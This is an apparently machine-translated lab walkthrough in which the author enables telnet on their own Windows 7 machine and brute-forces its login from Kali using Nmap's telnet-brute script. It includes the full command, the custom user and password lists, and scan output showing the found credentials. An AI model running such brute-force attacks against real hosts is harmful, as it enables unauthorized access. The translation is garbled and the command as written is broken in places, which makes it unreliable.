Today, old black out of the trough, set up a penalty mechanism after a lot of efficiency, now write a use NMAP to detect the target host and exploit the vulnerability of the article, say not much, directly start!
0X01: Introduction to the Environment
Host A: System-kali2017,ip-192.168.1.104
Host B: System-win7x64,ip-192.168.1.103
Use host A to scan and hack into Host B
0X02: Verify that Host B has telnet 23 port enabled
Host B does not open, I open it myself.
S1: Open or close the Windows program--check box, control Panel, programs, and then restart the system by clicking Confirm.
S2: Verify that the computer Telnet service is turned on. Open the computer, right-click Services, Services and applications, locate the Telnet service, and turn it on for services and settings automatically
0X03: In Host a scan, verify that Host B has port 23 turned on
0X04: For blasting
S1: See the official website, the blasting command is as follows
--script telnet-brute--script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s < Target>
S2: Make your own myusers.lst and mypwds.lst
Lao Hei put his account aaaa in the Myusers.lst, as follows:
Aaaaaa22asdfsasdsdd
Put your own password bbbb in Mypwds.lst, as follows:
Bbbbbb23dfasdfasadfaa
Depending on the environment of host A, adjust the command as follows:
at 192.168. 1.103
S3: Execute command, wait for result
[Email protected]:~# nmap-p--script telnet-brute--script-args userdb=./userpass/myusers.lst,passdb=./userpass/ mypwds.lst,telnet-brute.timeout=8s 192.168.1.103Starting Nmap 7.60 (https://nmap.org) at 2017-11-15 18:18 Cstnmap scan R Eport for Promote.cache-dns.local (192.168.1.103) Host was up (0.091s latency). PORT State service23/tcp Open telnet| telnet-brute: | Accounts: | Aaaa:bbbb-valid credentials|_ statistics:performed 6 guesses in 1 seconds, average Tps:6.0mac address:xxxxxxxxxxx XX (xxxxxxxxxxxx.) Nmap done:1 IP Address (1 host up) scanned in 1.49 seconds
0x05:telnet Landing host B,well done!
"20171115" Nmap uses script blasting telnet password